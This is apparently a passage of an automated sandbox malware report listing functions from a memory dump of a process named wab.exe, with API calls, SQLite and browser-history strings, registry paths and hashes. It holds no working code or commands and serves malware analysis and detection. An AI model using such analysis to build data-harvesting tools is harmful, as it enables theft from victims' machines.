                                                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                            • API String ID: 2221118986-1606337402
                                                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 265355444-0
                                                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                              • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1973883786-0
                                                                                            • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                            • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2618321458-3614832568
                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004185FC
                                                                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@AttributesFilememset
                                                                                            • String ID:
                                                                                            • API String ID: 776155459-0
                                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2308052813-0
                                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PathTemp$??3@
                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                            • API String ID: 1589464350-1420421710
                                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040FDD5
                                                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                                            • API String ID: 1775345501-2769808009
                                                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0041477F
                                                                                            • wcscpy.MSVCRT ref: 0041479A
                                                                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$CloseCreateFileHandle
                                                                                            • String ID: General
                                                                                            • API String ID: 999786162-26480598
                                                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                                            • String ID: Error$Error %d: %s
                                                                                            • API String ID: 313946961-1552265934
                                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                                            • API String ID: 0-1953309616
                                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                            • API String ID: 3510742995-272990098
                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: gj
                                                                                            • API String ID: 1297977491-4203073231
                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2903831945-0
                                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1471605966-0
                                                                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                            • String ID: \StringFileInfo\
                                                                                            • API String ID: 102104167-2245444037
                                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$??3@
                                                                                            • String ID: g4@
                                                                                            • API String ID: 3314356048-2133833424
                                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memicmpwcslen
                                                                                            • String ID: @@@@$History
                                                                                            • API String ID: 1872909662-685208920
                                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                            Uniqueness

